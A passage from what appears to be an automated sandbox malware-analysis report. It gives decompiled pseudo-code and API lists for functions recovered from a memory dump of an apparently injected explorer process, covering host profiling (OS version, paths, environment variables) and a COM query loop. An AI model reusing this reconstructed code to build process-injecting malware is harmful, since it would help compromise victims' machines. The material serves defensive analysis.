                  				void* _t24;
                  				void* _t29;
                  				void* _t35;
                  
                  				_t35 = __eflags;
                  				_t24 = __ecx;
                  				_t8 =  *0x9e688; // 0xb0000
                  				E0009249B(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
                  				E000885EF();
                  				E00088F78();
                  				 *0x9e780 = 0;
                  				 *0x9e784 = 0;
                  				 *0x9e77c = 0;
                  				E00085EB6(); // executed
                  				E0008CF84(_t24);
                  				_t14 =  *0x9e688; // 0xb0000
                  				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
                  				_t15 =  *0x9e688; // 0xb0000
                  				E0008A86D( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7, _t35);
                  				E0008B337( &_v44);
                  				memset( &_v44, 0, 0x27);
                  				E00085C26( &_v44, __fp0);
                  				_t21 =  *0x9e684; // 0x40f8f0
                  				 *((intOrPtr*)(_t21 + 0xdc))(0, _t29);
                  				return 0;
                  			}












                  APIs
                    • Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                    • Part of subcall function 0008CF84: GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
                    • Part of subcall function 0008CF84: GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
                    • Part of subcall function 0008CF84: memset.MSVCRT ref: 0008CFE2
                    • Part of subcall function 0008CF84: GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
                    • Part of subcall function 0008CF84: GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3
                    • Part of subcall function 0008B337: CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A
                  • memset.MSVCRT ref: 00085D5F
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CurrentProcessmemset$CloseCreateFileHandleHeapModuleNameVersion
                  • String ID:
                  • API String ID: 4245722550-0
                  • Opcode ID: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
                  • Instruction ID: 619f41ac1f5a27a22a19cca9ef8015db0493fccabd3b7c3a99182c1f6e1babcb
                  • Opcode Fuzzy Hash: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
                  • Instruction Fuzzy Hash: 28011D71501254AFF600FBA8DC4ADD97BE4FF18750F850066F44497263DB745940CBA2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0008861A(int _a4, intOrPtr _a8) {
                  				int _t3;
                  				intOrPtr _t4;
                  				void* _t9;
                  
                  				_t3 = _a4;
                  				if(_t3 == 0) {
                  					return _t3;
                  				}
                  				_t9 =  *_t3;
                  				if(_t9 != 0) {
                  					 *_t3 =  *_t3 & 0x00000000;
                  					_t4 = _a8;
                  					if(_t4 != 0xffffffff) {
                  						if(_t4 == 0xfffffffe) {
                  							_t4 = E0008C392(_t9);
                  						}
                  					} else {
                  						_t4 = E0008C379(_t9);
                  					}
                  					E0008874F(_t9, 0, _t4);
                  					_t3 = HeapFree( *0x9e768, 0, _t9); // executed
                  				}
                  				return _t3;
                  			}







                  APIs
                  • HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: FreeHeap
                  • String ID:
                  • API String ID: 3298025750-0
                  • Opcode ID: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
                  • Instruction ID: a28974b748b9f8cdd91a2a14d7a9ce437aea9645c05ed6ae8ab8bbe52d99dc9a
                  • Opcode Fuzzy Hash: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
                  • Instruction Fuzzy Hash: A4F0E5315016246FEA607A24EC01FAE3798BF12B30FA4C211F854EB1D1EF31AD1187E9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0008A77D(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                  				signed int _t5;
                  				void* _t6;
                  				void* _t10;
                  				long _t15;
                  				void* _t17;
                  
                  				_t15 = 2;
                  				_t5 = E0008A5F7(_a4, _t15);
                  				_t17 = _t5;
                  				if(_t17 != 0) {
                  					_t6 = E0008A65C(_t17, _a8, _a12); // executed
                  					if(_t6 != 0) {
                  						CloseHandle(_t17);
                  						return 0;
                  					}
                  					_t10 = 0xfffffffe;
                  					return _t10;
                  				}
                  				return _t5 | 0xffffffff;
                  			}









                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
                  • Instruction ID: 663aae789e914c9616d0efe74e5f130c4bdd51193654dc020258e593981ed1c8
                  • Opcode Fuzzy Hash: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
                  • Instruction Fuzzy Hash: 14E02236308A256BAB217A689C5099E37A4BF0A7707200213F9658BAC2DA30D84193D2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E000898A6(void* __eflags, intOrPtr _a4) {
                  				intOrPtr _t24;
                  
                  				_t24 = _a4;
                  				if(E0008A4BF( *(_t24 + 0x1c), 0x3a98) >= 0) {
                  					CloseHandle( *(_t24 + 0x1c));
                  					 *((intOrPtr*)(_t24 + 0x18)) =  *((intOrPtr*)(_t24 + 8))( *((intOrPtr*)(_t24 + 0xc)));
                  					if(( *(_t24 + 0x14) & 0x00000001) == 0) {
                  						E0008984A(_t24, 1);
                  					}
                  					return  *((intOrPtr*)(_t24 + 0x18));
                  				}
                  				return 0;
                  			}





                  APIs
                  • CloseHandle.KERNELBASE(?), ref: 000898CA
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CloseHandle
                  • String ID:
                  • API String ID: 2962429428-0
                  • Opcode ID: 5ef8d3bc2a1d0954a875872caaf3ef1d034ba8ea9ac2313de69fc76a64cb86ef
                  • Instruction ID: b32fbe6ba74ab13a60de709608ce14b267378680ed387debe1417f5410f660e5
                  • Opcode Fuzzy Hash: 5ef8d3bc2a1d0954a875872caaf3ef1d034ba8ea9ac2313de69fc76a64cb86ef
                  • Instruction Fuzzy Hash: C0F0A031300702DBC720BF62E80496BBBE9FF563507048829E5C687962DB71F8019790
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E0008B337(void* __ecx) {
                  				intOrPtr _t4;
                  				void* _t5;
                  				intOrPtr _t6;
                  				void* _t12;
                  				void* _t13;
                  
                  				_t4 =  *0x9e684; // 0x40f8f0
                  				_t13 = 0;
                  				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
                  				_t12 = _t5;
                  				if(_t12 != 0) {
                  					_t6 =  *0x9e684; // 0x40f8f0
                  					_push(_t12);
                  					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
                  						_t13 = 1;
                  					}
                  					CloseHandle(_t12);
                  					return _t13;
                  				}
                  				return _t5;
                  			}









                  APIs
                  • CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CloseHandle
                  • String ID:
                  • API String ID: 2962429428-0
                  • Opcode ID: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
                  • Instruction ID: 8fe01f62ba4c39ee7338d5a8f0e8a0c9642a3c10550f89b54f48b15bd4262c2d
                  • Opcode Fuzzy Hash: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
                  • Instruction Fuzzy Hash: 15E04F33300120ABD6609B69EC4CF677BA9FBA6A91F060169F905C7111CB248C02C7A1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  C-Code - Quality: 86%
                  			E0008D01F(void* __fp0) {
                  				char _v8;
                  				char _v12;
                  				char _v16;
                  				struct _SYSTEM_INFO _v52;
                  				char _v180;
                  				char _v692;
                  				char _v704;
                  				char _v2680;
                  				void* __esi;
                  				struct _OSVERSIONINFOA* _t81;
                  				intOrPtr _t83;
                  				void* _t84;
                  				long _t86;
                  				intOrPtr* _t88;
                  				intOrPtr _t90;
                  				intOrPtr _t95;
                  				intOrPtr _t97;
                  				void* _t98;
                  				intOrPtr _t103;
                  				char* _t105;
                  				void* _t108;
                  				char _t115;
                  				signed int _t117;
                  				char _t119;
                  				intOrPtr _t124;
                  				intOrPtr _t127;
                  				intOrPtr _t130;
                  				intOrPtr _t134;
                  				intOrPtr _t147;
                  				intOrPtr _t149;
                  				intOrPtr _t152;
                  				intOrPtr _t154;
                  				signed int _t159;
                  				struct HINSTANCE__* _t162;
                  				short* _t164;
                  				intOrPtr _t167;
                  				WCHAR* _t168;
                  				char* _t169;
                  				intOrPtr _t181;
                  				intOrPtr _t200;
                  				void* _t215;
                  				char _t218;
                  				void* _t219;
                  				char* _t220;
                  				struct _OSVERSIONINFOA* _t222;
                  				void* _t223;
                  				int* _t224;
                  				void* _t241;
                  
                  				_t241 = __fp0;
                  				_t162 =  *0x9e69c; // 0x10000000
                  				_t81 = E00088604(0x1ac4);
                  				_t222 = _t81;
                  				if(_t222 == 0) {
                  					return _t81;
                  				}
                  				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
                  				_t83 =  *0x9e684; // 0x40f8f0
                  				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
                  				_t3 = _t222 + 0x648; // 0x648
                  				E00092301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
                  				_t5 = _t222 + 0x1644; // 0x1644
                  				_t216 = _t5;
                  				_t86 = GetModuleFileNameW(0, _t5, 0x105);
                  				_t227 = _t86;
                  				if(_t86 != 0) {
                  					 *((intOrPtr*)(_t222 + 0x1854)) = E00088FBE(_t216, _t227);
                  				}
                  				GetCurrentProcess();
                  				_t88 = E0008BA05();
                  				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
                  				_t178 =  *_t88;
                  				if(E0008BB8D( *_t88) == 0) {
                  					_t90 = E0008BA62(_t178, _t222);
                  					__eflags = _t90;
                  					_t181 = (0 | _t90 > 0x00000000) + 1;
                  					__eflags = _t181;
                  					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
                  				} else {
                  					 *((intOrPtr*)(_t222 + 0x214)) = 3;
                  				}
                  				_t12 = _t222 + 0x220; // 0x220
                  				 *((intOrPtr*)(_t222 + 0x218)) = E0008E3F1(_t12);
                  				 *((intOrPtr*)(_t222 + 0x21c)) = E0008E3B6(_t12);
                  				_push( &_v16);
                  				 *(_t222 + 0x224) = _t162;
                  				_push( &_v8);
                  				_v12 = 0x80;
                  				_push( &_v692);
                  				_v8 = 0x100;
                  				_push( &_v12);
                  				_t22 = _t222 + 0x114; // 0x114
                  				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
                  				_t95 =  *0x9e68c; // 0x40fab8
                  				_push(0);
                  				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
                  					GetLastError();
                  				}
                  				_t97 =  *0x9e694; // 0x40fa48
                  				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
                  				_t26 = _t222 + 0x228; // 0x228
                  				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
                  				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
                  				GetLastError();
                  				_t31 = _t222 + 0x228; // 0x228
                  				 *((intOrPtr*)(_t222 + 0x434)) = E00088FBE(_t31, _t98);
                  				_t34 = _t222 + 0x114; // 0x114
                  				_t103 = E0008B7A8(_t34,  &_v692);
                  				_t35 = _t222 + 0xb0; // 0xb0
                  				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
                  				_push(_t35);
                  				E0008B67D(_t103, _t35, _t98, _t241);
                  				_t37 = _t222 + 0xb0; // 0xb0
                  				_t105 = _t37;
                  				_t38 = _t222 + 0xd0; // 0xd0
                  				_t164 = _t38;
                  				if(_t105 != 0) {
                  					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
                  					if(_t159 > 0) {
                  						_t164[_t159] = 0;
                  					}
                  				}
                  				_t41 = _t222 + 0x438; // 0x438
                  				_t42 = _t222 + 0x228; // 0x228
                  				E00088FD8(_t42, _t41);
                  				_t43 = _t222 + 0xb0; // 0xb0
                  				_t108 = E0008D400(_t43, E0008C379(_t43), 0);
                  				_t44 = _t222 + 0x100c; // 0x100c
                  				E0008B88A(_t108, _t44, _t241);
                  				_t199 = GetCurrentProcess();
                  				 *((intOrPtr*)(_t222 + 0x101c)) = E0008BBDF(_t110);
                  				memset(_t222, 0, 0x9c);
                  				_t224 = _t223 + 0xc;
                  				_t222->dwOSVersionInfoSize = 0x9c;
                  				GetVersionExA(_t222);
                  				_t167 =  *0x9e684; // 0x40f8f0
                  				_t115 = 0;
                  				_v8 = 0;
                  				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
                  					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
                  					_t115 = _v8;
                  				}
                  				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
                  				if(_t115 == 0) {
                  					GetSystemInfo( &_v52);
                  					_t117 = _v52.dwOemId & 0x0000ffff;
                  				} else {
                  					_t117 = 9;
                  				}
                  				_t54 = _t222 + 0x1020; // 0x1020
                  				_t168 = _t54;
                  				 *(_t222 + 0x9c) = _t117;
                  				GetWindowsDirectoryW(_t168, 0x104);
                  				_t119 = E000895E1(_t199, 0x10c);
                  				_t200 =  *0x9e684; // 0x40f8f0
                  				_t218 = _t119;
                  				 *_t224 = 0x104;
                  				_push( &_v704);
                  				_push(_t218);
                  				_v8 = _t218;
                  				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
                  					_t154 =  *0x9e684; // 0x40f8f0
                  					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
                  				}
                  				E000885D5( &_v8);
                  				_t124 =  *0x9e684; // 0x40f8f0
                  				_t61 = _t222 + 0x1434; // 0x1434
                  				_t219 = _t61;
                  				 *_t224 = 0x209;
                  				_push(_t219);
                  				_push(L"USERPROFILE");
                  				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
                  					E00089640(_t219, 0x105, L"%s\\%s", _t168);
                  					_t152 =  *0x9e684; // 0x40f8f0
                  					_t224 =  &(_t224[5]);
                  					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
                  				}
                  				_push(0x20a);
                  				_t64 = _t222 + 0x122a; // 0x122a
                  				_t169 = L"TEMP";
                  				_t127 =  *0x9e684; // 0x40f8f0
                  				_push(_t169);
                  				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
                  					_t149 =  *0x9e684; // 0x40f8f0
                  					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
                  				}
                  				_push(0x40);
                  				_t220 = L"SystemDrive";
                  				_push( &_v180);
                  				_t130 =  *0x9e684; // 0x40f8f0
                  				_push(_t220);
                  				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
                  					_t147 =  *0x9e684; // 0x40f8f0
                  					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
                  				}
                  				_v8 = 0x7f;
                  				_t72 = _t222 + 0x199c; // 0x199c
                  				_t134 =  *0x9e684; // 0x40f8f0
                  				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
                  				_t75 = _t222 + 0x100c; // 0x100c
                  				E00092301(E0008D400(_t75, E0008C379(_t75), 0),  &_v2680);
                  				_t76 = _t222 + 0x1858; // 0x1858
                  				E000922D3( &_v2680, _t76, 0x20);
                  				_t79 = _t222 + 0x1878; // 0x1878
                  				E0008902D(1, _t79, 0x14, 0x1e,  &_v2680);
                  				 *((intOrPtr*)(_t222 + 0x1898)) = E0008CD33(_t79);
                  				return _t222;
                  			}




















































                  APIs
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • GetCurrentProcessId.KERNEL32 ref: 0008D046
                  • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 0008D082
                  • GetCurrentProcess.KERNEL32 ref: 0008D09F
                  • GetLastError.KERNEL32 ref: 0008D13E
                  • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 0008D16C
                  • GetLastError.KERNEL32 ref: 0008D172
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 0008D1C7
                  • GetCurrentProcess.KERNEL32 ref: 0008D20E
                  • memset.MSVCRT ref: 0008D229
                  • GetVersionExA.KERNEL32(00000000), ref: 0008D234
                  • GetCurrentProcess.KERNEL32(00000100), ref: 0008D24E
                  • GetSystemInfo.KERNEL32(?), ref: 0008D26A
                  • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0008D287
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
                  • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                  • API String ID: 3876402152-2706916422
                  • Opcode ID: 12dfeda50fcfa05c5d9c49e5a909d2d4da4cbeaac424930ed5d12b2800c1f241
                  • Instruction ID: 25e8395d91437c6831676a43eef48ae52fba165dceb8ee9639bfc079f816c02c
                  • Opcode Fuzzy Hash: 12dfeda50fcfa05c5d9c49e5a909d2d4da4cbeaac424930ed5d12b2800c1f241
                  • Instruction Fuzzy Hash: 77B16071600704AFE750EB70DD89FEA77E8BF58300F00456AF59AD7292EB74AA04CB21
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 50%
                  			E0008DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                  				signed int _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				char _v24;
                  				void* _v28;
                  				signed int _v32;
                  				char _v36;
                  				intOrPtr _v40;
                  				signed int _v44;
                  				char _v48;
                  				char _v52;
                  				intOrPtr _v56;
                  				signed int _v60;
                  				char* _v72;
                  				signed short _v80;
                  				signed int _v84;
                  				char _v88;
                  				char _v92;
                  				char _v96;
                  				intOrPtr _v100;
                  				char _v104;
                  				char _v616;
                  				intOrPtr* _t159;
                  				char _t165;
                  				signed int _t166;
                  				signed int _t173;
                  				signed int _t178;
                  				signed int _t186;
                  				intOrPtr* _t187;
                  				signed int _t188;
                  				signed int _t192;
                  				intOrPtr* _t193;
                  				intOrPtr _t200;
                  				intOrPtr* _t205;
                  				signed int _t207;
                  				signed int _t209;
                  				intOrPtr* _t210;
                  				intOrPtr _t212;
                  				intOrPtr* _t213;
                  				signed int _t214;
                  				char _t217;
                  				signed int _t218;
                  				signed int _t219;
                  				signed int _t230;
                  				signed int _t235;
                  				signed int _t242;
                  				signed int _t243;
                  				signed int _t244;
                  				signed int _t245;
                  				intOrPtr* _t247;
                  				intOrPtr* _t251;
                  				signed int _t252;
                  				intOrPtr* _t253;
                  				void* _t255;
                  				intOrPtr* _t261;
                  				signed int _t262;
                  				signed int _t283;
                  				signed int _t289;
                  				char* _t298;
                  				void* _t320;
                  				signed int _t322;
                  				intOrPtr* _t323;
                  				intOrPtr _t324;
                  				signed int _t327;
                  				intOrPtr* _t328;
                  				intOrPtr* _t329;
                  
                  				_v32 = _v32 & 0x00000000;
                  				_v60 = _v60 & 0x00000000;
                  				_v56 = __edx;
                  				_v100 = __ecx;
                  				_t159 = E0008D523(__ecx);
                  				_t251 = _t159;
                  				_v104 = _t251;
                  				if(_t251 == 0) {
                  					return _t159;
                  				}
                  				_t320 = E00088604(0x10);
                  				_v36 = _t320;
                  				_pop(_t255);
                  				if(_t320 == 0) {
                  					L53:
                  					E0008861A( &_v60, 0xfffffffe);
                  					E0008D5D7( &_v104);
                  					return _t320;
                  				}
                  				_t165 = E000895E1(_t255, 0x536);
                  				 *_t328 = 0x609;
                  				_v52 = _t165;
                  				_t166 = E000895E1(_t255);
                  				_push(0);
                  				_push(_v56);
                  				_v20 = _t166;
                  				_push(_t166);
                  				_push(_a4);
                  				_t322 = E000892E5(_t165);
                  				_v60 = _t322;
                  				E000885D5( &_v52);
                  				E000885D5( &_v20);
                  				_t329 = _t328 + 0x20;
                  				if(_t322 != 0) {
                  					_t323 = __imp__#2;
                  					_v40 =  *_t323(_t322);
                  					_t173 = E000895E1(_t255, 0x9e4);
                  					_v20 = _t173;
                  					_v52 =  *_t323(_t173);
                  					E000885D5( &_v20);
                  					_t324 = _v40;
                  					_t261 =  *_t251;
                  					_t252 = 0;
                  					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
                  					__eflags = _t178;
                  					if(_t178 != 0) {
                  						L52:
                  						__imp__#6(_t324);
                  						__imp__#6(_v52);
                  						goto L53;
                  					}
                  					_t262 = _v32;
                  					_v28 = 0;
                  					_v20 = 0;
                  					__eflags = _t262;
                  					if(_t262 == 0) {
                  						L49:
                  						 *((intOrPtr*)( *_t262 + 8))(_t262);
                  						__eflags = _t252;
                  						if(_t252 == 0) {
                  							E0008861A( &_v36, 0);
                  							_t320 = _v36;
                  						} else {
                  							 *(_t320 + 8) = _t252;
                  							 *_t320 = E000891E3(_v100);
                  							 *((intOrPtr*)(_t320 + 4)) = E000891E3(_v56);
                  						}
                  						goto L52;
                  					} else {
                  						goto L6;
                  					}
                  					while(1) {
                  						L6:
                  						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
                  						__eflags = _t186;
                  						if(_t186 != 0) {
                  							break;
                  						}
                  						_v16 = 0;
                  						_v48 = 0;
                  						_v12 = 0;
                  						_v24 = 0;
                  						__eflags = _v84;
                  						if(_v84 == 0) {
                  							break;
                  						}
                  						_t187 = _v28;
                  						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
                  						__eflags = _t188;
                  						if(_t188 >= 0) {
                  							__imp__#20(_v24, 1,  &_v16);
                  							__imp__#19(_v24, 1,  &_v48);
                  							_t46 = _t320 + 0xc; // 0xc
                  							_t253 = _t46;
                  							_t327 = _t252 << 3;
                  							_t47 = _t327 + 8; // 0x8
                  							_t192 = E00088698(_t327, _t47);
                  							__eflags = _t192;
                  							if(_t192 == 0) {
                  								__imp__#16(_v24);
                  								_t193 = _v28;
                  								 *((intOrPtr*)( *_t193 + 8))(_t193);
                  								L46:
                  								_t252 = _v20;
                  								break;
                  							}
                  							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
                  							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E00088604( *(_t327 +  *_t253) << 3);
                  							_t200 =  *_t253;
                  							__eflags =  *(_t327 + _t200 + 4);
                  							if( *(_t327 + _t200 + 4) == 0) {
                  								_t136 = _t320 + 0xc; // 0xc
                  								E0008861A(_t136, 0);
                  								E0008861A( &_v36, 0);
                  								__imp__#16(_v24);
                  								_t205 = _v28;
                  								 *((intOrPtr*)( *_t205 + 8))(_t205);
                  								_t320 = _v36;
                  								goto L46;
                  							}
                  							_t207 = _v16;
                  							while(1) {
                  								_v12 = _t207;
                  								__eflags = _t207 - _v48;
                  								if(_t207 > _v48) {
                  									break;
                  								}
                  								_v44 = _v44 & 0x00000000;
                  								_t209 =  &_v12;
                  								__imp__#25(_v24, _t209,  &_v44);
                  								__eflags = _t209;
                  								if(_t209 < 0) {
                  									break;
                  								}
                  								_t212 = E000891E3(_v44);
                  								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                  								_t213 = _v28;
                  								_t281 =  *_t213;
                  								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                  								__eflags = _t214;
                  								if(_t214 < 0) {
                  									L39:
                  									__imp__#6(_v44);
                  									_t207 = _v12 + 1;
                  									__eflags = _t207;
                  									continue;
                  								}
                  								_v92 = E000895E1(_t281, 0x250);
                  								 *_t329 = 0x4cc;
                  								_t217 = E000895E1(_t281);
                  								_t283 = _v80;
                  								_v96 = _t217;
                  								_t218 = _t283 & 0x0000ffff;
                  								__eflags = _t218 - 0xb;
                  								if(__eflags > 0) {
                  									_t219 = _t218 - 0x10;
                  									__eflags = _t219;
                  									if(_t219 == 0) {
                  										L35:
                  										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
                  										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                  										__eflags = _t289;
                  										if(_t289 == 0) {
                  											L38:
                  											E000885D5( &_v92);
                  											E000885D5( &_v96);
                  											__imp__#9( &_v80);
                  											goto L39;
                  										}
                  										_push(_v72);
                  										_push(L"%d");
                  										L37:
                  										_push(0xc);
                  										_push(_t289);
                  										E00089640();
                  										_t329 = _t329 + 0x10;
                  										goto L38;
                  									}
                  									_t230 = _t219 - 1;
                  									__eflags = _t230;
                  									if(_t230 == 0) {
                  										L33:
                  										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
                  										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                  										__eflags = _t289;
                  										if(_t289 == 0) {
                  											goto L38;
                  										}
                  										_push(_v72);
                  										_push(L"%u");
                  										goto L37;
                  									}
                  									_t235 = _t230 - 1;
                  									__eflags = _t235;
                  									if(_t235 == 0) {
                  										goto L33;
                  									}
                  									__eflags = _t235 == 1;
                  									if(_t235 == 1) {
                  										goto L33;
                  									}
                  									L28:
                  									__eflags = _t283 & 0x00002000;
                  									if((_t283 & 0x00002000) == 0) {
                  										_v88 = E000895E1(_t283, 0x219);
                  										E00089640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                  										E000885D5( &_v88);
                  										_t329 = _t329 + 0x18;
                  										_t298 =  &_v616;
                  										L31:
                  										_t242 = E000891E3(_t298);
                  										L32:
                  										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                  										goto L38;
                  									}
                  									_t242 = E0008DA20( &_v80);
                  									goto L32;
                  								}
                  								if(__eflags == 0) {
                  									__eflags = _v72 - 0xffff;
                  									_t298 = L"TRUE";
                  									if(_v72 != 0xffff) {
                  										_t298 = L"FALSE";
                  									}
                  									goto L31;
                  								}
                  								_t243 = _t218 - 1;
                  								__eflags = _t243;
                  								if(_t243 == 0) {
                  									goto L38;
                  								}
                  								_t244 = _t243 - 1;
                  								__eflags = _t244;
                  								if(_t244 == 0) {
                  									goto L35;
                  								}
                  								_t245 = _t244 - 1;
                  								__eflags = _t245;
                  								if(_t245 == 0) {
                  									goto L35;
                  								}
                  								__eflags = _t245 != 5;
                  								if(_t245 != 5) {
                  									goto L28;
                  								}
                  								_t298 = _v72;
                  								goto L31;
                  							}
                  							__imp__#16(_v24);
                  							_t210 = _v28;
                  							 *((intOrPtr*)( *_t210 + 8))(_t210);
                  							_t252 = _v20;
                  							L42:
                  							_t262 = _v32;
                  							_t252 = _t252 + 1;
                  							_v20 = _t252;
                  							__eflags = _t262;
                  							if(_t262 != 0) {
                  								continue;
                  							}
                  							L48:
                  							_t324 = _v40;
                  							goto L49;
                  						}
                  						_t247 = _v28;
                  						 *((intOrPtr*)( *_t247 + 8))(_t247);
                  						goto L42;
                  					}
                  					_t262 = _v32;
                  					goto L48;
                  				} else {
                  					E0008861A( &_v36, _t322);
                  					_t320 = _v36;
                  					goto L53;
                  				}
                  			}


                  APIs
                    • Part of subcall function 0008D523: CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
                    • Part of subcall function 0008D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
                    • Part of subcall function 0008D523: CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
                    • Part of subcall function 0008D523: SysAllocString.OLEAUT32(00000000), ref: 0008D569
